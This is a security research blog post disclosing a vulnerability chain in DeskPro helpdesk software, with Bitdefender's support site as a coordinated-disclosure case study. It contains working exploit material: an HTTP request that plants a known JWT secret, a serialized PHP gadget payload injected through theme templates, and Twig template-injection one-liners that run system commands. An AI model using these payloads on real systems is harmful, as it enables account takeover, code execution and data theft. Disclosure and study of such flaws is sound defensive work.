{"id":502,"date":"2020-03-28T21:39:19","date_gmt":"2020-03-28T21:39:19","guid":{"rendered":"http:\/\/blog.redforce.io\/?p=502"},"modified":"2024-12-14T15:24:04","modified_gmt":"2024-12-14T15:24:04","slug":"attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study","status":"publish","type":"post","link":"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/","title":{"rendered":"Attacking HelpDesks Part 1: RCE Chain on DeskPro, with Bitdefender as a Case Study"},"content":{"rendered":"<h1><span class=\"ez-toc-section\" id=\"TLDR\"><\/span>TL;DR.<span class=\"ez-toc-section-end\"><\/span><\/h1><div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 ez-toc-wrap-right counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<label for=\"ez-toc-cssicon-toggle-item-69d577e64bd78\" class=\"ez-toc-cssicon-toggle-label\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #ff0000;color:#ff0000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #ff0000;color:#ff0000\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input type=\"checkbox\"  id=\"ez-toc-cssicon-toggle-item-69d577e64bd78\" checked aria-label=\"Toggle\" \/><nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#TLDR\" title=\"TL;DR.\">TL;DR.<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#Preface\" title=\"Preface\">Preface<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#About_DeskPro\" title=\"About DeskPro\">About DeskPro<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#Vulnerability_Details\" title=\"Vulnerability Details\">Vulnerability Details<\/a><ul class='ez-toc-list-level-2' ><li class='ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#1_Insufficient_Access_Control_at_Multiple_API_endpoints\" title=\"1. Insufficient Access Control at Multiple API endpoints\">1. Insufficient Access Control at Multiple API endpoints<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#apiapps_%E2%80%93_CVE-2020-11465\" title=\"\/api\/apps\/*\u00a0 &#8211; (CVE-2020-11465)\">\/api\/apps\/*\u00a0 &#8211; (CVE-2020-11465)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#apiemail_accounts_%E2%80%93_CVE-2020-11463\" title=\"\/api\/email_accounts &#8211; (CVE-2020-11463)\">\/api\/email_accounts &#8211; (CVE-2020-11463)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#apitickets_%E2%80%93_CVE-2020-11466\" title=\"\/api\/tickets &#8211; (CVE-2020-11466)\">\/api\/tickets &#8211; (CVE-2020-11466)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#apipeople_%E2%80%93_CVE-2020-11464\" title=\"\/api\/people &#8211; (CVE-2020-11464)\">\/api\/people &#8211; (CVE-2020-11464)<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#2_Insecure_Deserialization_to_RCE_in_Template_Editing_Feature_Needs_Admin_Privilege_CVE-2020-11467\" title=\"2. Insecure Deserialization to RCE in Template Editing Feature (Needs Admin Privilege) [CVE-2020-11467]\">2. Insecure Deserialization to RCE in Template Editing Feature (Needs Admin Privilege) [CVE-2020-11467]<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#How_to_Identify_Passively\" title=\"How to Identify Passively?\">How to Identify Passively?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#Now_Time_for_Fun_Part_Exploitation\" title=\"Now.. Time for Fun Part.. Exploitation!\">Now.. Time for Fun Part.. Exploitation!<\/a><ul class='ez-toc-list-level-2' ><li class='ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-13\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#1_Retrieving_Limited_User_API_Token\" title=\"1. Retrieving Limited User API Token\">1. Retrieving Limited User API Token<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-14\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#2_Compromising_JWT_Authentication\" title=\"2. Compromising JWT Authentication\">2. Compromising JWT Authentication<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-15\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#3_Getting_Administrative_Access_to_Helpdesk\" title=\"3. Getting Administrative Access to Helpdesk\">3. Getting Administrative Access to Helpdesk<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-16\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#4_Executing_Arbitrary_Code_on_Bitdefender_Helpdesk\" title=\"4. Executing Arbitrary Code on Bitdefender Helpdesk\">4. Executing Arbitrary Code on Bitdefender Helpdesk<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-17\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#UPDATE\" title=\"[UPDATE]\">[UPDATE]<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-18\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#Real_Impact\" title=\"Real Impact\">Real Impact<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-19\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#Bitdefender_and_DeskPro_Response\" title=\"Bitdefender and DeskPro Response\">Bitdefender and DeskPro Response<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-20\" href=\"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/#Whats_Next\" title=\"What&#8217;s Next?\">What&#8217;s Next?<\/a><\/li><\/ul><\/nav><\/div>\n\n<p>We decided to look at the most popular on-premise helpdesk solutions. In this article we explain how we managed to find and exploit multiple vulnerabilities that eventually lead to remote code execution (RCE) at DeskPro software utilized by thousands of organizations using Bitdefender and Freelancer Inc in a case study. No full exploit is currently available, but steps can be easily reproduced and used to build one.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Preface\"><\/span>Preface<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>A helpdesk is now a crucial part of any company\u2019s online presence. With much sensitive information exchanged between agents and clients, it makes it the perfect target for an adversary targeting the organization.<\/p>\n<p>In September 2019, we decided to have a look at some of the most popular open-source helpdesk solutions. Between cloud and on-premise, we preferred to focus on self-hosted solutions because the risks accompanied with them extend beyond data breach to potential internal network infiltration. So, we chose on-prem versions of <strong>DeskPro<\/strong>, <strong>osTicket<\/strong> and <strong>Kayako<\/strong> (We also did \u201cPHP Live!\u201d as a plus for a client) and will present our principal findings in this and the upcoming articles.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"About_DeskPro\"><\/span>About DeskPro<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>As defined by them<\/p>\n<blockquote><p>Deskpro is a helpdesk software solution that helps companies manage their communication with their customers and user base across a multiple channels; email, live chat, voice, social media<\/p><\/blockquote>\n<p>DeskPro has clients in different industries. Some of the well-known names per their website are: Microsoft, Siemens, P&amp;G, Vodafone, HMRC, CapitalOne, Panasonic, NHS, Valve, Brown University, Hotel Chocolat, Garmin, Team USA, Arrow, Pure, Xerox, 1&amp;1, Booz Allen Hamilton, Bitdefender, US Department of Defense and more.<\/p>\n<p>The last published CVE\/exploit for DeskPro was in 2007 and last (and only) security advisory on their current website was in 2015. This meant that either this application is robust or overlooked. So we took the challenge and we decided to see for ourselves.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Vulnerability_Details\"><\/span>Vulnerability Details<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>Since we have much to present and this article is already getting long, we decided to keep the upcoming parts focused on the discovered vulnerabilities themselves rather than the motivation and paths used to find them, if anyone is interested, please let us know in the comments.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"1_Insufficient_Access_Control_at_Multiple_API_endpoints\"><\/span>1. Insufficient Access Control at Multiple API endpoints<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p style=\"text-align: justify;\">DeskPro shows high degree of automation and integration through API interfaces that enable developers to build apps that interact with different components of the system. However, multiple API endpoints were found to have a problem properly validating user\u2019s privilege, giving a normal user arbitrary unauthorized access to various actions and information. The following table shows the most important ones<\/p>\n<h3><span class=\"ez-toc-section\" id=\"apiapps_%E2%80%93_CVE-2020-11465\"><\/span>\/api\/apps\/*\u00a0 &#8211; (CVE-2020-11465)<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Controlling\/installing helpdesk applications, leaking current applications\u2019 configurations, <em>including applications used as user sources (used for authentication) such as JWT<\/em>.\u00a0 This enables an attacker to forge valid authentication models that resembles any user on the system <strong>(Privilege Escalation)<\/strong><\/p>\n<h3><span class=\"ez-toc-section\" id=\"apiemail_accounts_%E2%80%93_CVE-2020-11463\"><\/span>\/api\/email_accounts &#8211; (CVE-2020-11463)<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Retrieve plaintext credentials of all helpdesk email accounts, including incoming and outgoing email credentials<\/p>\n<h3><span class=\"ez-toc-section\" id=\"apitickets_%E2%80%93_CVE-2020-11466\"><\/span>\/api\/tickets &#8211; (CVE-2020-11466)<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Retrieve sensitive information about all helpdesk tickets stored in database with numerous filters. Additionally, it leaks ticket auth code, making it possible to make changes to the ticket<\/p>\n<h3><span class=\"ez-toc-section\" id=\"apipeople_%E2%80%93_CVE-2020-11464\"><\/span>\/api\/people &#8211; (CVE-2020-11464)<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Retrieve sensitive information about all users\u2019 registered on the system. This includes their full name, privilege, email address, phone number\u2026etc. (will be of a good use in our attack scenario)<\/p>\n<h2><span class=\"ez-toc-section\" id=\"2_Insecure_Deserialization_to_RCE_in_Template_Editing_Feature_Needs_Admin_Privilege_CVE-2020-11467\"><\/span>2. Insecure Deserialization to RCE in Template Editing Feature <strong>(Needs Admin Privilege) [CVE-2020-11467]<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>DeskPro enables administrators to modify helpdesk interface by editing theme templates and uses TWIG as its template engine. While direct access to <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">self<\/code>, <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">_self<\/code> variables was not permitted, we could abuse the accessible variables in our context to reach PHP\u2019s native <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">unserialize<\/code>\u00a0function where we passed our crafted payload to trigger a set of POP gadgets in order to achieve remote code execution.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"How_to_Identify_Passively\"><\/span>How to Identify Passively?<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>There is nothing cooler than launching a mass scanner hacking the world, while you are chilling out enjoying your favorite movie on Netflix \ud83d\ude00 Luckily, this one is easy to deploy, because DeskPro gives you detailed information about current version deployed under the following API call &#8220;<strong>\/api\/v2\/helpdesk\/discover<\/strong>&#8220;. So with a simple unauthenticated GET request, if you find &#8220;<span class=\"treeLabel stringLabel\" aria-labelledby=\"default\" data-level=\"1\">build_name&#8221; less than &#8220;<strong>2019.8.0<\/strong>&#8220;, it is probably your lucky day.<\/span><\/p>\n<h1><span class=\"ez-toc-section\" id=\"Now_Time_for_Fun_Part_Exploitation\"><\/span>Now.. Time for Fun Part.. Exploitation!<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>So the plan goes as follow, register a normal guest account (self-registration enabled by default), leak JWT secret, login as administrator, trigger deserialization and voila&#8230; server compromised!<\/p>\n<p>Bitdefender Support Center (support.bitdefender.com) is using Deskpro. So, we will use it as the case study in this article. But first I would like to give Bitdefender team a big shoutout for their awesome response. Although this issue affects a third-party product, they have deployed a temporary fix within hours and fixed the whole thing (in coordination with DeskPro team) in less than 24 hours and they have been cool enough to allow us to publish this article.<br \/>\nThe reason we chose Bitdefender is that through our experience with their bug bounty program, they have always been friendly, highly responsible, and actively encouraging security research to enhance their security posture.<\/p>\n<p>So let&#8217;s begin!<\/p>\n<h2><span class=\"ez-toc-section\" id=\"1_Retrieving_Limited_User_API_Token\"><\/span>1. Retrieving Limited User API Token<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>In order to establish our attack, we need a valid user account, which we can easily obtain via self-registration at <a href=\"https:\/\/support.bitdefender.com\/en\/register\">https:\/\/support.bitdefender.com\/en\/register<\/a>.<\/p>\n<p>After activating user\u2019s account, we can request access token by sending username and password to the following API endpoint (https:\/\/support.bitdefender.com\/api\/v2\/api_tokens) as shown below<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-507\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/Getting_API_Token-1.png\" alt=\"Getting Norma User API Token\" width=\"945\" height=\"773\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-507\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/Getting_API_Token-1.png\" alt=\"Getting Norma User API Token\" width=\"945\" height=\"773\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/Getting_API_Token-1.png 945w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/Getting_API_Token-1-300x245.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/Getting_API_Token-1-768x628.png 768w\" sizes=\"auto, (max-width: 945px) 100vw, 945px\" \/><\/noscript><\/p>\n<h2><span class=\"ez-toc-section\" id=\"2_Compromising_JWT_Authentication\"><\/span>2. Compromising JWT Authentication<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<blockquote><p><strong>Note: Any further requests to API interface would require Authorization header to be set to base64 value of the retrieved API token as shown in the following steps<\/strong><\/p><\/blockquote>\n<p>DeskPro has a set of built-in applications that can be used for authentication, one of them is <a href=\"https:\/\/www.deskpro.com\/apps\/json-web-token\/\">JWT app<\/a> identified by <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">deskpro_us_jwt<\/code>. As a quick reminder for those who are not much familiar with JWT, it can be regarded as a method for representing claims (such as user identity). To ensure data integrity and security, they are usually signed with a secret key which can be used to validate provided claims. You can find more information <a href=\"https:\/\/jwt.io\/introduction\/\">here<\/a>.\u00a0 So, if JWT authentication is enabled and we have this key, we can authenticate to the application as any user.<\/p>\n<p>Due to access-control vulnerability within DeskPro, normal user&#8217;s could access API endpoints responsible for applications including JWT. Which means, a simple GET request to &#8220;https:\/\/support.bitdefender.com\/api\/apps\/packages\/deskpro_us_jwt?usersource_type=user&#8221; with normal user privilege, would leak JWT secret.<\/p>\n<p>In Bitdefender case, JWT authentication was not enabled. However, we managed to enable it by issuing PUT request to the same endpoint as shown below<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\">PUT \/api\/apps\/packages\/deskpro_us_jwt?usersource_type=user HTTP\/1.1\r\nHost: support.bitdefender.com\r\nAuthorization: Basic &lt;redacted&gt;\r\nContent-Type: application\/json\r\nContent-Length: 269\r\n\r\n{\"settings\":{\"sso_type\":\"none\",\"auto_agent\":true,\"dp_app\":{\"title\":\"JSON Web Token (JWT)\"},\"actions\":[],\"enable_usersource\":true,\"url\":\"https:\/\/www.google.com\",\"secret\":\"V3ryS3cr3tK3y\",\"algo\":\"HS256\",\"login_custom_text\":\"Login\",\"logout_agent_url\":\"https:\/\/www.google.com\"}}\r\n\r\n<\/pre>\n<p data-enlighter-language=\"js\">We can confirm that user source is now available by sending GET request to the same endpoint. We identify <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">usersource<\/code> id from the following screenshot<\/p>\n<p data-enlighter-language=\"js\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-511\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_app.png\" alt=\"Retrieving JWT APP Info\" width=\"917\" height=\"620\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-511\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_app.png\" alt=\"Retrieving JWT APP Info\" width=\"917\" height=\"620\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_app.png 917w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_app-300x203.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_app-768x519.png 768w\" sizes=\"auto, (max-width: 917px) 100vw, 917px\" \/><\/noscript><\/p>\n<h2 data-enlighter-language=\"js\"><span class=\"ez-toc-section\" id=\"3_Getting_Administrative_Access_to_Helpdesk\"><\/span>3. Getting Administrative Access to Helpdesk<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>To be able to forge a valid administrator JWT token, we need to know administrator&#8217;s email. Instead of guessing or bruteforcing our options, we utilized another broken access-control issue at &#8220;https:\/\/support.bitdefender.com\/api\/people?is_agent=1&#8221; endpoint which brought back to us a list of all system agents and administrators. Administrators had the flag <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">can_admin<\/code> set to <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">true<\/code><\/p>\n<p>After retrieving administrator&#8217;s email, knowing the secret key of JWT authentication app, we managed to forge a valid JWT token and authenticate to the application using the following URL https:\/\/support.bitdefender.com\/login\/authenticate-callback\/6?jwt=&lt;redacted&gt;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-513\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_token.png\" alt=\"Forging Valid JWT Token\" width=\"1549\" height=\"494\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-513\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_token.png\" alt=\"Forging Valid JWT Token\" width=\"1549\" height=\"494\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_token.png 1549w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_token-300x96.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_token-1024x327.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_token-768x245.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_token-1536x490.png 1536w\" sizes=\"auto, (max-width: 1549px) 100vw, 1549px\" \/><\/noscript><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-514\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/adminpanel.png\" alt=\"Accessing Bitdefender Support Admin Panel\" width=\"1920\" height=\"688\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-514\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/adminpanel.png\" alt=\"Accessing Bitdefender Support Admin Panel\" width=\"1920\" height=\"688\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/adminpanel.png 1920w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/adminpanel-300x108.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/adminpanel-1024x367.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/adminpanel-768x275.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/adminpanel-1536x550.png 1536w\" sizes=\"auto, (max-width: 1920px) 100vw, 1920px\" \/><\/noscript><\/p>\n<h2><span class=\"ez-toc-section\" id=\"4_Executing_Arbitrary_Code_on_Bitdefender_Helpdesk\"><\/span>4. Executing Arbitrary Code on Bitdefender Helpdesk<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Now with administrative access, we can trigger deserialization vulnerability that exists in theme editing feature. All we need to prepare is a proper POP gadget to achieve code execution. After we have discovered the gadget chain in Guzzle library, we found out that it was already known and published in ambionics&#8217; awesome tool <a href=\"https:\/\/github.com\/ambionics\/phpggc\">PHPGGC<\/a>, so shoutout for them and @proclnas for the awesome work.<\/p>\n<p>So, generate the serialized object using PHPGGC (we choose a minimal PoC that executes <code class=\"EnlighterJSRAW\" data-enlighter-language=\"php\">phpinfo()<\/code> ) and edit application&#8217;s templates to contain your payload and deserialize it as shown in the following request<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\">PUT \/portal\/api\/style\/edit-theme-set\/template-sources HTTP\/1.1\r\nHost: support.bitdefender.com\r\nCookie: &lt;redacted&gt;\r\nContent-Type: application\/json\r\nContent-Length: 564\r\n\r\n{\"template\":\"Theme::layout.html.twig\",\"code\":\"{% set p = 'O:24:\\\"GuzzleHttp\\\\\\\\Psr7\\\\\\\\FnStream\\\":2:{s:33:\\\"\\\\x00GuzzleHttp\\\\\\\\Psr7\\\\\\\\FnStream\\\\x00methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\\\\\HandlerStack\\\":3:{s:32:\\\"\\\\x00GuzzleHttp\\\\\\\\HandlerStack\\\\x00handler\\\";s:1:\\\"1\\\";s:30:\\\"\\\\x00GuzzleHttp\\\\\\\\HandlerStack\\\\x00stack\\\";a:1:{i:0;a:1:{i:0;s:7:\\\"phpinfo\\\";}}s:31:\\\"\\\\x00GuzzleHttp\\\\\\\\HandlerStack\\\\x00cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:14:\\\"_fn___toString\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}' %} {{var_dump(app.getUser().unserialize(p))}}\"}<\/pre>\n<p>Now, navigate to preview page to trigger your payload (https:\/\/support.bitdefender.com\/admin-preview-1\/new-ticket) as shown below<img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-515\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/bitdefender_phpinfo.png\" alt=\"Bitdefender phpinfo() result after payload execution\" width=\"1632\" height=\"985\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-515\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/bitdefender_phpinfo.png\" alt=\"Bitdefender phpinfo() result after payload execution\" width=\"1632\" height=\"985\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/bitdefender_phpinfo.png 1632w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/bitdefender_phpinfo-300x181.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/bitdefender_phpinfo-1024x618.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/bitdefender_phpinfo-768x464.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/bitdefender_phpinfo-1536x927.png 1536w\" sizes=\"auto, (max-width: 1632px) 100vw, 1632px\" \/><\/noscript><\/p>\n<p>After reaching this point, we reported our findings to Bitdefender and did not attempt to do any lateral movement.<\/p>\n<h1 id=\"RCE-Update\"><span class=\"ez-toc-section\" id=\"UPDATE\"><\/span>[UPDATE]<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>Mahmoud Gamal (@Zombiehelp54) <a href=\"https:\/\/www.facebook.com\/redforce.io\/posts\/1662187887256156?comment_id=1662259720582306\">brought to our attention<\/a> another way that can be used to achieve remote code execution (RCE) via twig template injection. It was even part of VolgaCTF 2020 Qualifier challenge. Apparently, using any of the following vectors lead to executing system commands.<\/p>\n<p><code class=\"EnlighterJSRAW\" data-enlighter-language=\"js\">{{ app.request.query.filter(0,'whoami',1024,{'options':'system'}) }}<\/code><\/p>\n<p><code class=\"EnlighterJSRAW\" data-enlighter-language=\"js\">{{['whoami']|filter('system')}}<\/code><\/p>\n<p>We have tested both vectors on the latest stable version and it works like a charm.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Real_Impact\"><\/span>Real Impact<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>Since most -if not all- helpdesk instances enable self-registration (because, well&#8230; it is a helpdesk for &#8220;customers&#8221;), the vulnerability enables a remote attacker to fully compromise helpdesk instance. This includes all information exchanged between agents and clients which usually contain very sensitive information and PII. Moreover, application configurations and secret keys are leaked (e.g. JIRA API integration public and private keys) . An attacker can also reach company&#8217;s intranet and use this helpdesk instance as a pivot point to infiltrate corporate network.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Bitdefender_and_DeskPro_Response\"><\/span>Bitdefender and DeskPro Response<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>Bitdefender took the issue very seriously and applied full patches in less than 24 hours which was quite remarkable given that the vulnerable code was in a third-party product. So a big shoutout to them and DeskPro team for fast response.<\/p>\n<p>DeskPro 